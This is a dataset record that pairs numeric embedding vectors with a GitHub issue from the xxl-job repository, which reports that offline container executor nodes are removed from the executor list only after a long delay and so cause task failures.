0.01671910285949707, 0.017757736146450043, 0.0034008012153208256, -0.014771667309105396, -0.007104536984115839, -0.0067727514542639256, -0.00229004118591547, -0.022532561793923378, -0.008720188401639462, -0.010761390440165997, 0.013725821860134602, 0.013365184888243675, 0.004590901546180248, -0.014728390611708164, 0.001660730573348701, 0.008525444194674492, -0.03035116009414196, -0.010177159681916237, 0.0017887565772980452, 0.0028886976651847363, 0.01166298147290945, 0.004706304986029863, 0.015016899444162846, -0.0005161608569324017, -0.016459444537758827, 0.009448673576116562, -0.010624348185956478, 0.017123015597462654, -0.01788756623864174, -0.003534236690029502, -0.006264254450798035, 0.02179686352610588, 0.0010656805243343115, -0.005885586142539978, 0.005564619787037373, -0.02928367629647255, 0.004349275026470423, 0.0011837889906018972, 0.01097055897116661, -0.0021800471004098654, 0.015002474188804626, -0.017728885635733604, -0.004233871586620808, -0.015045750886201859, 0.027668025344610214, 0.017829863354563713, -0.0020790689159184694, -0.002931973896920681, -0.016416169703006744, 0.01024207379668951, 0.026384159922599792, -0.005211195908486843, -0.001111661666072905, -0.011901001445949078, -0.021623758599162102, -0.025504207238554955, -0.0033250676933676004, -0.010061755776405334, 0.026917900890111923, 0.02272009290754795, 0.010855155996978283, -0.013920565135776997, 0.01059549767524004, 0.00926114246249199, 0.003141143126413226, -0.025965820997953415, -0.0320822149515152, 0.01596898026764393, 0.002446918049827218, -0.019907129928469658, -0.002010548021644354, 0.004122074227780104, -0.006123606115579605, -0.007955638691782951, 0.0009556864388287067, -0.0017995756352320313, -0.023297112435102463, -0.019647471606731415, -0.0028021447360515594, 0.022272903472185135, 0.041227951645851135, -0.0006315644714049995, -0.00680520897731185, 0.004890229552984238, 0.01820492558181286, 0.000001461563556404144, -0.004681060556322336, -0.02097461372613907, 0.003768650349229574, -0.0010187978623434901, -0.008597571402788162, 0.0004300589207559824, 0.008770677261054516, -0.03202451393008232, 0.006426540669053793, 0.019690748304128647, 0.003956181462854147, 0.00040751913911662996, 0.017685608938336372, 0.01754135452210903, -0.010862368158996105, 0.0056547787971794605, -0.002243158407509327, -0.01793084107339382, -0.01586800254881382, 0.007991702295839787, 0.0009051973465830088, 0.03603478893637657, 0.016906633973121643, 0.02342694066464901, 0.0087490389123559, 0.0154929393902421, 0.016488296911120415, -0.0023657747078686953, 0.010249286890029907, 0.00988864991813898, 0.0014822155935689807, 0.002434295602142811, 0.019185855984687805, -0.00894378311932087, -0.00171933404635638, 0.00667177326977253, -0.004345668479800224, 0.00807825569063425, 0.008994271978735924, 0.0064229341223835945, -0.016445020213723183, -0.006859304383397102, -0.015305409207940102, 0.029168272390961647, 0.018911773338913918, -0.004893836099654436, -0.01024207379668951, -0.015391961671411991, 0.01647387072443962, 0.027696875855326653, 0.0065671890042722225, -0.0018572774715721607, -0.015146728605031967, 0.010429604910314083, -0.0009412610088475049, -0.015435238368809223, 0.03603478893637657, 0.0020646434277296066, 0.004727943334728479, 0.005799033213406801, 0.009189015254378319, 0.0006297613144852221, 0.012946846894919872, -0.009549652226269245, 0.007970064878463745, 0.019532067701220512, 0.020888060331344604, -0.011922639794647694, 0.011655768379569054, 0.004049947019666433, -0.005607896018773317, 0.0015489333309233189, 0.012434743344783783, -0.0009448673808947206, 0.019056027755141258, -0.008987058885395527, -0.009448673576116562, -0.008655273355543613, 0.014447093941271305, -0.019835002720355988, -0.0016922863433137536, -0.029802992939949036, 0.00013174497871659696, 0.00014786091924179345, -0.020152362063527107, -0.021912267431616783, 0.0015489333309233189, -0.01771445944905281, 0.00018448806076776236, -0.059721387922763824, -0.008345126174390316, -0.0064337532967329025, 0.030235756188631058, 0.01625748910009861, -0.00044966849964112043, 0.012023617513477802, -0.009369333274662495, -0.02874993346631527, 0.005312174092978239, -0.003732586745172739, 0.001058467896655202, -0.005975745152682066, 0.019070452079176903, -0.0096001410856843, 0.006069510709494352, -0.03130323812365532, 0.008857229724526405, 0.005928862374275923, -0.012297701090574265, 0.00965784303843975, 0.002538880333304405, -0.0017553976504132152, 0.02325383573770523, 0.0031032762490212917, 0.018219351768493652, -0.008337914012372494, -0.0009737182990647852, -0.00983094796538353, 0.0038119268137961626, -0.010306987911462784, -0.016069957986474037, -0.008792315609753132, -0.01009781938046217, -0.0027606715448200703, 0.0016426987713202834, 0.005153493955731392, -0.016459444537758827, 0.015464088879525661, 0.02680249698460102, 0.021450653672218323, -0.002138573909178376, 0.00500563345849514, -0.008301850408315659, 0.0010981378145515919, -0.00239642895758152, 0.00889329332858324, 0.025821566581726074, -0.0021710311993956566, 0.007768108043819666, -0.00529774883762002, -0.010588284581899643, -0.018839646130800247, -0.007681555580347776, 0.0035739068407565355, -0.0021962756291031837, -0.01107875071465969, 0.008200871758162975, 0.014713965356349945, -0.013365184888243675, 0.0028688625898212194, 0.005928862374275923, 0.0013433706481009722, 0.018911773338913918, 0.0005175132537260652, -0.006386870518326759, -0.005950500722974539, -0.0033106422051787376, 0.02274894341826439, -0.008316275663673878, 0.006404902320355177, -0.021984394639730453, -0.010862368158996105, 0.02339809015393257, -0.0022557806223630905, -0.027206409722566605, 0.0034206362906843424, -0.03759273886680603, -0.012694401666522026, -0.006051478907465935, 0.025850417092442513, 0.008987058885395527, -0.0024829816538840532, 0.0040427339263260365, -0.010422391816973686, -0.012492445297539234, 0.009917501360177994, 0.005561013240367174, -0.005319386720657349, -0.004933505784720182, 0.006697018165141344, -0.001142315799370408, 0.010609922930598259, -0.00800612848252058, 0.055855367332696915, 0.0015994224231690168, 0.001019699382595718, -0.006350806914269924, -0.0017013022443279624, 0.0017734294524416327, -0.01533425971865654, -0.016243062913417816, 0.0006288597360253334, 0.014216287061572075, -0.004269935190677643, -0.0016580258961766958, -0.01110760122537613, -0.00566199142485857, -0.01827705278992653, 0.004205020610243082, -0.001187395304441452, 0.0111797284334898, -0.016978761181235313, -0.016589274629950523, -0.010112244635820389, -0.0002607851929496974, 0.034736499190330505, -0.0193156860768795, -0.015045750886201859, 0.0028093575965613127, 0.041199102997779846, -0.032918889075517654, -0.007064867299050093, -0.00001610185245226603, 0.01524770725518465, -0.02062840200960636, -0.010220435447990894, -0.0034116203896701336, 0.011186941526830196, -0.010559434071183205, -0.018291478976607323, 0.012795379385352135, -0.0057341186329722404, -0.009491950273513794, -0.012679975479841232, 0.012124596163630486, -0.012110169976949692, 0.011230217292904854, 0.005932468920946121, 0.008482168428599834, -0.014915921725332737, 0.004655816126614809, 0.008547082543373108, 0.0131848668679595, 0.009210653603076935, 0.005838703364133835, -0.005409546196460724, -0.014129734598100185, -0.010934495367109776, 0.0028039480093866587, 0.005442003253847361, -0.007360588759183884, -0.01183608639985323, -0.0184645839035511, -0.007768108043819666, -0.02211422473192215, -0.0018365408759564161, -0.002389216097071767, -0.024696379899978638, -0.008871655911207199, -0.004450253210961819, 0.013408461585640907, -0.03407292813062668, 0.03410177677869797, 0.006076723337173462, -0.006740294396877289, -0.024292467162013054, 0.0002553756639827043, -0.017685608938336372, -0.01625748910009861, 0.03159174695611, 0.009347695857286453, -0.0020790689159184694, 0.00032840450876392424, -0.003287200815975666, -0.009571289643645287, -0.0050813667476177216, -0.005333812441676855, 0.00615966971963644, -0.013062250800430775, -0.005481673404574394, 0.005413152277469635, -0.01746922731399536, 0.00004398073724587448, 0.009650629945099354, 0.0037614377215504646, -0.015997830778360367, -0.011352834291756153, 0.021104441955685616, 0.007962851785123348, -0.003880447708070278, 0.0083234878256917, -0.0005084973527118564, 0.02396068163216114, -0.018291478976607323, -0.00773925706744194, -0.019358962774276733, -0.012312126345932484, 0.022907624021172523, -0.006931431591510773, 0.003256546799093485, -0.011489875614643097, -0.01226163748651743, 0.008604784496128559, 0.012961272150278091, 0.003626198973506689, -0.010732538998126984, 0.011143664829432964, 0.007450748234987259, -0.009376546368002892, 0.00566920405253768, 0.0032944134436547756, 0.0032150736078619957, 0.01267276331782341, -0.005045303143560886, -0.0019438301678746939, 0.03361131250858307, 0.010638773441314697, -0.013458950445055962, -0.005579045042395592, 0.006935038138180971, 0.011482663452625275, 0.005211195908486843, -0.0015633588191121817, -0.0018365408759564161, 0.007710406091064215, 0.01368254516273737, 0.012001979164779186, 0.004259116016328335, 0.013141590170562267, -0.007353376131504774, 0.015074601396918297, 0.020859209820628166, -0.002892303979024291, -0.00608032988384366, 0.023152856156229973, -0.007991702295839787, 0.016069957986474037, -0.01182166114449501, 0.0161565113812685, -0.013264207169413567, 0.01625748910009861, -0.0055429814383387566, -0.006621284410357475, 0.00008041064575081691, -0.0006261549424380064, 0.001994319260120392, 0.0066465288400650024, 0.010379116050899029, 0.009189015254378319, 0.010458455421030521, 0.001954649342224002, -0.013278632424771786, -0.017901990562677383, -0.005254472140222788, 0.0060839359648525715, -0.00867691170424223, -0.011295132339000702, -0.010429604910314083, 0.009109675884246826, -0.00673668785020709, 0.0014470535097643733, 0.018406881019473076, 0.0030167235527187586, -0.020224489271640778, -0.012910783290863037, -0.010350264608860016, -0.016805656254291534, 0.00616688234731555, 0.004388945177197456, 0.014576923102140427, 0.007609427906572819, -0.006704230792820454, -0.00774646969512105, 0.005827884189784527, 0.02874993346631527, -0.02459540218114853, 0.007876299321651459, 0.023297112435102463, -0.006769145373255014, 0.0028273893985897303, 0.011475450359284878, 0.001341567374765873, -0.0009926516795530915, 0.005048909690231085, -0.016459444537758827, 0.01167740672826767, 0.009463098831474781, -0.020859209820628166, 0.012427530251443386, 0.013047824613749981, -0.013076676055788994, 0.03095702826976776, -0.02836044691503048, 0.0031645845156162977, -0.01977729983627796, -0.01018437184393406, 0.021061165258288383 ]
null
null
null
null
null
null
null
null
null
[ "xuxueli", "xxl-job" ]
容器节点注册xxl-job执行器时,已下线的节点需过很长一段时间才会被移除执行器列表,导致任务执行失败概率高
容器节点注册xxl-job执行器,已下线的节点移除延时严重
https://api.github.com/repos/xuxueli/xxl-job/issues/3452/comments
2
2024-05-15T08:38:14
2024-06-20T05:38:09Z
https://github.com/xuxueli/xxl-job/issues/3452
2,297,228,990
3,452
false
This is a GitHub Issue repo:xxl-job owner:xuxueli Title : 容器节点注册xxl-job执行器,已下线的节点移除延时严重 Issue date: --- start body --- 容器节点注册xxl-job执行器时,已下线的节点需过很长一段时间才会被移除执行器列表,导致任务执行失败概率高 --- end body ---
192
[ -0.014819965697824955, 0.011268259026110172, 0.0009720461675897241, -0.006299606990069151, 0.028458520770072937, -0.015253648161888123, -0.001889882143586874, 0.06538132578134537, -0.005020992364734411, -0.0007346426136791706, 0.018199695274233818, 0.0034825424663722515, -0.033677663654088974, 0.014363851398229599, 0.011275735683739185, 0.04070630297064781, 0.013264691457152367, 0.018962377682328224, 0.04908085614442825, -0.01291325967758894, -0.011410326696932316, 0.013892782852053642, 0.05234094709157944, 0.07136314362287521, 0.02228228934109211, 0.011096280999481678, 0.006146322935819626, 0.0016627598088234663, -0.021639244630932808, -0.016255604103207588, 0.011933736503124237, 0.0014122709399089217, 0.01461807917803526, 0.015821920707821846, 0.027650974690914154, 0.008815711364150047, 0.039330486208200455, 0.01231507770717144, -0.008823188953101635, -0.024914292618632317, -0.025333018973469734, -0.009653166867792606, -0.05081558600068092, 0.0007706269971095026, 0.003555445931851864, -0.005174276884645224, -0.016913603991270065, 0.004194753244519234, -0.026110656559467316, 0.03481420874595642, 0.015492920763790607, -0.03287011757493019, -0.014625556766986847, -0.056677769869565964, -0.016704240813851357, -0.032212115824222565, 0.0526699498295784, 0.01914183236658573, -0.02401701919734478, 0.02071206085383892, -0.015089147724211216, -0.012285168282687664, -0.026559293270111084, 0.015066715888679028, -0.004351776093244553, 0.03140456974506378, -0.015463011339306831, 0.02377774566411972, -0.019440924748778343, 0.006019209045916796, -0.011141144670546055, -0.005013515241444111, 0.013578737154603004, -0.036399390548467636, 0.009398939087986946, -0.03532266244292259, -0.013399282470345497, -0.0030525990296155214, 0.008666166104376316, -0.026589201763272285, -0.01740710437297821, 0.008793279528617859, -0.012404805049300194, -0.007552050985395908, 0.05910040810704231, 0.020487742498517036, -0.029116522520780563, -0.06412514299154282, 0.004497583024203777, 0.0035236673429608345, -0.030806386843323708, -0.01703323982656002, -0.0010496230097487569, -0.013451623730361462, -0.0012085151392966509, 0.004740594420582056, -0.03768548369407654, 0.007910960353910923, -0.06023695319890976, -0.030073612928390503, -0.020188651978969574, -0.022372016683220863, -0.0269780196249485, -0.011791667900979519, 0.019291378557682037, -0.00936902966350317, -0.006404289044439793, -0.04211203381419182, 0.010842054150998592, 0.10587826371192932, 0.0354423001408577, -0.00036475100205279887, -0.04061657562851906, -0.01775105856359005, -0.05712640658020973, 0.019022196531295776, 0.023523518815636635, 0.003880707547068596, -0.038343485444784164, -0.0023441268131136894, 0.05440467596054077, -0.0300137959420681, -0.0017151007195934653, -0.01335441879928112, -0.03140456974506378, 0.00452375365421176, 0.01676405780017376, 0.0354423001408577, 0.008202574215829372, 0.003136718412861228, -0.02428620122373104, 0.0014515266520902514, -0.02258138172328472, -0.02783042937517166, -0.0006879096035845578, -0.014969510957598686, 0.017362240701913834, 0.0662785992026329, -0.025258246809244156, -0.015492920763790607, -0.03164384141564369, -0.0686713233590126, -0.007738983258605003, -0.02654433809220791, -0.016644421964883804, 0.012718850746750832, -0.014124578796327114, 0.006422982085496187, -0.0035236673429608345, 0.03185320645570755, -0.009533530101180077, -0.040287576615810394, -0.02020360715687275, 0.048602309077978134, 0.025318065658211708, -0.014378806576132774, -0.016584603115916252, -0.0011515008518472314, -0.017048195004463196, -0.012202918529510498, -0.0014225522754713893, -0.03681812062859535, 0.02548256516456604, -0.001401989720761776, -0.046628307551145554, -0.01740710437297821, 0.008875529281795025, 0.010445757769048214, -0.04001839458942413, 0.02606579288840294, -0.003906878177076578, -0.0342758446931839, 0.015971466898918152, 0.016674330458045006, 0.027680885046720505, 0.00030142778996378183, 0.03457493707537651, 0.02159438095986843, -0.0020730753894895315, -0.007484755478799343, -0.015477966517210007, 0.03921084851026535, -0.002970348810777068, 0.005361208692193031, 0.015926603227853775, -0.03179338946938515, -0.03816403076052666, -0.021743925288319588, 0.019396061077713966, -0.013189919292926788, -0.01601633056998253, 0.00487892422825098, 0.04342803359031677, -0.08440352231264114, -0.020891515538096428, -0.011978600174188614, 0.023254336789250374, -0.030806386843323708, 0.011014031246304512, -0.05419531464576721, -0.009937303140759468, 0.007439891807734966, -0.022835608571767807, -0.009765326045453548, -0.039180938154459, -0.013683419674634933, 0.011043940670788288, -0.02122051641345024, 0.029624976217746735, -0.004078855272382498, 0.023822609335184097, -0.013698373921215534, 0.020801788195967674, 0.017795922234654427, -0.0009926087222993374, 0.01908201538026333, 0.010969167575240135, 0.02851833961904049, -0.03358793631196022, -0.03107556886970997, 0.013660987839102745, -0.025647064670920372, -0.0024076837580651045, -0.004033991601318121, -0.02183365263044834, -0.012270214036107063, 0.005271481350064278, -0.01577705703675747, -0.017093058675527573, 0.00011998695117654279, 0.00031287738238461316, -0.006258482113480568, 0.0306269321590662, -0.009892439469695091, 0.001618830719962716, 0.01812492311000824, 0.017108013853430748, 0.012457146309316158, 0.00923443865031004, -0.035861026495695114, 0.03373748064041138, 0.04561140015721321, 0.0028862294275313616, -0.015238692983984947, -0.004314389545470476, -0.009167143143713474, 0.045940399169921875, -0.007933392189443111, 0.01914183236658573, 0.011133668012917042, -0.005903311539441347, -0.041573669761419296, -0.0010384070919826627, -0.005024731159210205, 0.023972155526280403, 0.006437936797738075, 0.0037049914244562387, 0.013481533154845238, -0.0019721321295946836, 0.01051305327564478, -0.009526052512228489, 0.02963993139564991, -0.06179222837090492, 0.025976065546274185, -0.008411938324570656, -0.05488322302699089, 0.0000589711926295422, 0.06448405236005783, 0.04743585363030434, -0.02054756134748459, -0.006710857152938843, -0.01233003195375204, -0.01461807917803526, 0.00714453961700201, -0.03263084217905998, -0.009570916183292866, -0.031015750020742416, 0.041543759405612946, 0.025288155302405357, -0.008793279528617859, -0.01692855916917324, -0.009309211745858192, 0.0007781042950227857, 0.02673874795436859, -0.01655469462275505, 0.0005271481350064278, 0.01034107618033886, -0.04357757791876793, -0.020427925512194633, -0.0019814788829535246, -0.04561140015721321, 0.00016146247799042612, 0.006897789426147938, 0.0331093892455101, 0.020966289564967155, -0.010288734920322895, -0.011245827190577984, 0.021743925288319588, -0.007166971452534199, -0.022730926051735878, -0.013317032717168331, 0.00409754877910018, 0.04994821920990944, -0.011918782256543636, -0.011350508779287338, 0.004329344257712364, -0.01219544094055891, 0.029953977093100548, 0.011933736503124237, 0.008725984022021294, 0.008000687696039677, -0.0024581553880125284, 0.0171977411955595, -0.06891059875488281, -0.0007439891924150288, 0.01567237637937069, 0.03436557203531265, -0.03284020721912384, -0.018753014504909515, -0.011014031246304512, -0.006105198059231043, 0.007593176327645779, -0.04573103412985802, 0.012322555296123028, 0.021474743261933327, -0.005241572391241789, -0.021414926275610924, 0.005308867897838354, -0.050127673894166946, 0.007585698738694191, 0.014573215506970882, -0.027067746967077255, -0.013683419674634933, -0.018139878287911415, -0.013533873483538628, -0.03903139382600784, -0.0465984009206295, 0.018065104261040688, 0.013174964115023613, -0.02258138172328472, 0.0005033143097534776, -0.03822384774684906, -0.018723106011748314, -0.014535829424858093, -0.013294600881636143, -0.027202337980270386, -0.010348553769290447, 0.009862530045211315, 0.05616931617259979, 0.008112846873700619, 0.0007907222025096416, -0.03633957356214523, 0.02670883759856224, 0.05470376834273338, 0.008232483640313148, -0.025841474533081055, -0.013137578032910824, 0.0392407588660717, 0.011283213272690773, -0.0013365634949877858, 0.0018188479589298368, -0.019740015268325806, -0.0079558240249753, 0.030238114297389984, 0.03179338946938515, 0.006748243700712919, -0.011118712835013866, -0.039809029549360275, -0.051802583038806915, 0.0012589867692440748, 0.0006430459325201809, 0.037894848734140396, 0.013130100443959236, 0.016464967280626297, 0.006351948250085115, 0.01051305327564478, -0.00045915163354948163, 0.023044971749186516, -0.022252380847930908, 0.02452547289431095, -0.029281022027134895, -0.002912400057539344, -0.0183641966432333, -0.003142326371744275, -0.013967555947601795, 0.04387667030096054, -0.002271223347634077, -0.02878752164542675, 0.03260093554854393, 0.009398939087986946, -0.02769583836197853, 0.021968243643641472, -0.06753478199243546, -0.024136655032634735, -0.021070970222353935, 0.024480609223246574, 0.0009010120411403477, -0.016001375392079353, -0.005335038062185049, -0.021579425781965256, -0.008711029775440693, 0.004161105491220951, 0.040825940668582916, 0.028712749481201172, 0.003020820440724492, -0.02971470355987549, -0.00654261838644743, -0.025258246809244156, 0.029864249750971794, -0.023658109828829765, -0.001212253817357123, 0.005507015623152256, -0.03215229883790016, -0.008838143199682236, 0.009398939087986946, 0.0020113878417760134, 0.03499366343021393, -0.019904514774680138, -0.03657884523272514, 0.001459938590414822, -0.017108013853430748, 0.035173118114471436, 0.026559293270111084, 0.03287011757493019, 0.008105370216071606, 0.017945468425750732, 0.04094557836651802, -0.019440924748778343, 0.014976988546550274, -0.024136655032634735, -0.010924303904175758, 0.021205561235547066, 0.011178531683981419, -0.005671515595167875, 0.01951569691300392, 0.0017319245962426066, 0.027950067073106766, -0.008554006926715374, -0.0034881504252552986, 0.0018674503080546856, -0.010213962756097317, 0.009810189716517925, 0.018005287274718285, -0.006819278001785278, -0.00904750730842352, -0.023822609335184097, -0.030806386843323708, 0.022192561998963356, -0.011118712835013866, -0.020891515538096428, -0.030058659613132477, -0.01175428181886673, -0.02990911342203617, -0.03864257410168648, 0.0001451059360988438, -0.011387894861400127, -0.01348900981247425, -0.01870815083384514, 0.028608066961169243, -0.00021999554883223027, -0.0009192379075102508, 0.032959844917058945, -0.015029329806566238, -0.01461807917803526, -0.002121677855029702, 0.009720462374389172, 0.015231216326355934, -0.013503964990377426, 0.038343485444784164, -0.009870007634162903, 0.02449556440114975, 0.008860575035214424, 0.00040517502930015326, 0.024719882756471634, -0.0060079931281507015, 0.050097767263650894, -0.006161277648061514, -0.03849302977323532, 0.004475151188671589, 0.00919705256819725, -0.05536177009344101, -0.06304841488599777, -0.02374783717095852, 0.026050837710499763, -0.01700333133339882, -0.02292533591389656, 0.0343356616795063, 0.005024731159210205, -0.015231216326355934, -0.00846427958458662, 0.037356484681367874, -0.0029049227014184, -0.012965600937604904, -0.015986422076821327, 0.021011153236031532, -0.05440467596054077, -0.029071658849716187, -0.032242026180028915, 0.016644421964883804, -0.03992866724729538, 0.005125674419105053, -0.005757504608482122, 0.013705851510167122, 0.01046071294695139, 0.017152877524495125, -0.02329920046031475, 0.01206084992736578, 0.028234202414751053, -0.019425969570875168, -0.055272042751312256, 0.0014318987959995866, -0.034395482391119, -0.004972390364855528, -0.028338884934782982, 0.0074249375611543655, -0.004886401351541281, 0.0011477622902020812, 0.014236737973988056, 0.025063836947083473, 0.04504312574863434, -0.0367283932864666, -0.005865924991667271, 0.0195904690772295, 0.011440236121416092, 0.007671687752008438, -0.022267336025834084, -0.009174620732665062, 0.010954213328659534, -0.004205969162285328, -0.009406416676938534, -0.0038059346843510866, 0.03325893357396126, 0.004905094858258963, 0.06020704656839371, 0.0016281773569062352, 0.014386283233761787, -0.0013029157416895032, -0.005794890690594912, -0.038822028785943985, 0.028727702796459198, 0.03239157050848007, 0.039569757878780365, -0.028473475947976112, -0.012075805105268955, -0.008987688459455967, -0.008920392952859402, -0.014565737918019295, -0.01270389650017023, -0.009997121058404446, 0.009114802815020084, -0.0306269321590662, -0.016435058787465096, 0.0013393674744293094, 0.02214769832789898, -0.021145744249224663, -0.04306912422180176, 0.004463935270905495, -0.006976300850510597, -0.009294257499277592, 0.01908201538026333, -0.010699985548853874, 0.01642010360956192, 0.014730238355696201, -0.026514429599046707, 0.01993442513048649, 0.0025142349768429995, -0.025063836947083473, 0.01583687588572502, -0.017526740208268166, -0.005671515595167875, 0.020801788195967674, -0.018065104261040688, -0.04417576268315315, 0.0007290346547961235, 0.011851486749947071, -0.017601514235138893, -0.004602265078574419, 0.013212351128458977, -0.014745192602276802, -0.00205625151284039, -0.009802712127566338, 0.01918669603765011, -0.02971470355987549, 0.025946155190467834, -0.0065912208519876, -0.03864257410168648, -0.01004946231842041, -0.021265380084514618, 0.0012963732006028295, 0.004448980558663607, -0.025153564289212227, 0.005963129457086325, -0.01059530396014452, 0.01434141956269741, 0.019635332748293877, 0.012277691625058651, -0.005847231950610876, -0.03164384141564369, 0.020996198058128357, -0.01890256069600582, 0.023628199473023415, 0.028398703783750534, -0.002102984581142664, -0.06968823820352554, -0.011679508723318577, 0.04109512269496918, -0.013982510194182396, 0.04635912552475929, -0.018992288038134575, 0.02551247365772724, 0.026140565052628517, 0.034664664417505264, 0.02060738019645214, -0.010296212509274483, 0.03083629533648491, 0.0275313388556242, 0.029490385204553604, -0.0015926603227853775, 0.029475431889295578, -0.005862186197191477, -0.012359941378235817, 0.010699985548853874, 0.041992396116256714, -0.022835608571767807, 0.007753937505185604, 0.017317377030849457, 0.017586559057235718, -0.021788788959383965, -0.0027759396471083164, 0.009152188897132874, -0.008838143199682236, 0.018214650452136993, -0.003557315096259117, -0.03454502671957016, 0.03472448140382767, -0.0061799706891179085, 0.022970199584960938, -0.012001032009720802, -0.015821920707821846, -0.02545265667140484, -0.01703323982656002, 0.0380743034183979, 0.03167375177145004, -0.01134303119033575, -0.01969515159726143, -0.009204530157148838, -0.02374783717095852, 0.01764637790620327, -0.00474433321505785, 0.02142987959086895, 0.014976988546550274, 0.04220176115632057, 0.004501321818679571, 0.0214597899466753, 0.025662019848823547, -0.002852581674233079, 0.02800988405942917, 0.035203028470277786, -0.01564246602356434, 0.026290111243724823, -0.02974461391568184, -0.007481017149984837, 0.004381685052067041, -0.019665243104100227, 0.037894848734140396, 0.0054285041987895966, -0.0041984920389950275, -0.006280913949012756, 0.012068327516317368, 0.04067639634013176, 0.003276917152106762, -0.02889220416545868, 0.016539739444851875, 0.013952601701021194, -0.018319332972168922, 0.01679396815598011, -0.0011028986191377044, -0.020966289564967155, 0.006494016386568546, 0.02923615835607052, -0.010408371686935425, -0.014707806520164013, 0.0031647582072764635, -0.008112846873700619, 0.0032040139194577932, 0.00018541314057074487, -0.015597602352499962, -0.019396061077713966, -0.0034133775625377893, 0.004867708310484886, -0.01791555993258953, 0.00269555882550776, -0.008120324462652206, -0.017526740208268166, -0.00744363060221076, 0.01852869614958763, 0.02255147136747837, 0.019799834117293358, 0.00007185197318904102, -0.0017599643906578422, -0.026783611625432968, 0.03583111986517906, -0.008060506545007229, 0.004205969162285328, -0.01785574108362198, 0.0011758020846173167, -0.008389506489038467, -0.022327153012156487, -0.03385711833834648, 0.012636600993573666, 0.005884618032723665, -0.002689950866624713, 0.015156443230807781, 0.0018599729519337416, -0.009301734156906605, -0.011978600174188614, -0.016435058787465096, -0.000861756328959018, -0.018319332972168922, -0.004187276121228933, -0.05942940711975098, 0.008875529281795025, -0.01809501461684704, -0.022805700078606606, -0.02129528857767582, 0.004938742611557245, 0.035861026495695114, 0.005884618032723665, -0.009413893334567547, 0.00766421016305685, -0.02412169985473156, 0.03215229883790016, -0.022476699203252792, -0.005222878884524107, -0.0009944780031219125, 0.023074882104992867, 0.010505576618015766, 0.009481188841164112, 0.03209247812628746, -0.00040891364915296435, 0.018723106011748314, -0.0018440837739035487, -0.0011300037149339914, 0.026559293270111084, -0.011701940558850765, -0.003561053890734911, -0.026020929217338562, 0.01969515159726143, -0.0318831168115139, 0.008404460735619068, 0.026559293270111084, 0.027636021375656128, -0.017317377030849457, -0.005525708664208651, -0.02646956592798233, 0.036638665944337845, 0.008486711420118809, -0.016838831827044487, 0.006067811511456966, 0.02783042937517166, 0.005507015623152256, 0.01822960563004017, 0.02657424658536911, 0.027486475184559822, 0.0159116480499506, 0.047645218670368195, 0.011103758588433266, -0.03571148216724396, -0.018857697024941444, 0.030955933034420013, -0.0226561538875103, -0.007028641644865274, -0.01292821392416954, -0.014797533862292767, -0.0033105649054050446, 0.0020749447867274284, 0.0052004470489919186, 0.004078855272382498, 0.00006969056994421408, -0.003974173683673143, 0.0005341580836102366, -0.014670420438051224, -0.005492060910910368, -0.00966064352542162, 0.009144711308181286, 0.002164672128856182, -0.006991255097091198, -0.003198405960574746, -0.001241228193975985, 0.024316109716892242, -0.03580120950937271, -0.008905438706278801, 0.009705507196485996, -0.0008047420997172594, 0.026409747079014778, -0.02095133438706398, 0.0037573324516415596, 0.009810189716517925, 0.01730242185294628, -0.02739674784243107, 0.021205561235547066, 0.013234782963991165, -0.028877248987555504, 0.009189574979245663, 0.001599202980287373, 0.010991599410772324, 0.014550783671438694, 0.02159438095986843, -0.033199116587638855, -0.005593004170805216, -0.03406647965312004, -0.008023119531571865, -0.016165876761078835, 0.02657424658536911, 0.034903936088085175, 0.01544805709272623, -0.0034059002064168453, 0.007122107781469822, -0.029789477586746216, 0.01754169538617134, 0.029789477586746216, 0.028937067836523056, 0.03977912291884422, 0.013451623730361462, -0.011679508723318577, -0.005877140909433365, 0.012823532335460186, 0.002529189456254244, 0.06268950551748276, -0.0024693713057786226, 0.023493608459830284, 0.016913603991270065, 0.010370985604822636, -0.02950534038245678, -0.024181518703699112, 0.037147119641304016, 0.012038418091833591, -0.001082336064428091, 0.014416192658245564, 0.02510870061814785, 0.04067639634013176, -0.023314153775572777, -0.018723106011748314, 0.01740710437297821, -0.0023684280458837748, -0.01090187206864357, -0.017093058675527573, -0.016973422840237617, -0.00730903958901763, 0.014393760822713375, -0.01004946231842041, 0.0065837437286973, 0.00936902966350317, -0.004482628311961889, 0.012277691625058651, -0.015134011395275593, 0.027785565704107285, 0.027994930744171143, -0.0016178961377590895, 0.010737371630966663, 0.022536518052220345, -0.01046071294695139, -0.015074193477630615, -0.010161621496081352, 0.02388242818415165, 0.02735188417136669, -0.010258826427161694, -0.04238121584057808, -0.017317377030849457, -0.0035199287813156843, -0.017422059550881386, -0.017795922234654427, 0.01078223530203104, -0.005155583377927542, -0.013668464496731758, 0.007226789370179176, -0.0007276326650753617, -0.013406760059297085, 0.003129241056740284, -0.015343375504016876, -0.02401701919734478, -0.012748760171234608, -0.0251386109739542, -0.011686986312270164, 0.019096968695521355, -0.013160009868443012, -0.00143096421379596, -0.02841365709900856, -0.032451387494802475, -0.030178295448422432, 0.021280335262417793, -0.017840785905718803, -0.01948578841984272, -0.006845448166131973, -0.016061194241046906, -0.02316460944712162, 0.0011748673859983683, -0.017018286511301994, -0.02878752164542675, 0.0004995756899006665, -0.01751178689301014, -0.0029927806463092566, 0.01487230695784092, -0.04288966953754425, 0.012225350365042686, -0.01607614941895008, 0.024106746539473534, 0.00560422008857131, -0.019336242228746414, -0.0043555148877203465, 0.007039857562631369, 0.0075632669031620026, 0.0056416066363453865, -0.02139997109770775, 0.038134120404720306, 0.02702288329601288, -0.018693195655941963, -0.039061304181814194, 0.018513740971684456, -0.0004430287517607212, -0.024405837059020996, 0.017691241577267647, -0.038343485444784164, 0.005667777266353369, -0.017526740208268166, -0.005884618032723665, -0.010415849275887012, 0.007338948547840118, -0.03143448010087013, 0.0026263941545039415, 0.015821920707821846, -0.010423325933516026, -0.007013686932623386, -0.007383812218904495, 0.011948690749704838, -0.01580696739256382, -0.010378462262451649, 0.001806697342544794, -0.009144711308181286, -0.01248705480247736, -0.0010673814686015248, 0.04967903718352318, -0.003022689837962389, -0.009526052512228489, 0.018932469189167023, 0.04363739863038063, -0.018109967932105064, 0.012277691625058651, -0.027979975566267967, -0.005649083759635687, -0.011642122641205788, 0.03008856810629368, 0.010445757769048214, -0.03499366343021393, 0.02009892463684082, 0.007047334685921669, -0.018618423491716385, 0.012943169102072716, -0.04190266877412796, 0.017392149195075035, 0.009092370979487896, 0.013870351016521454, 0.01751178689301014, -0.006041640881448984, -0.012240304611623287, 0.002377774566411972, -0.019530652090907097, 0.02923615835607052, -0.019784878939390182, 0.003389076329767704, -0.02660415694117546, 0.012083281762897968, 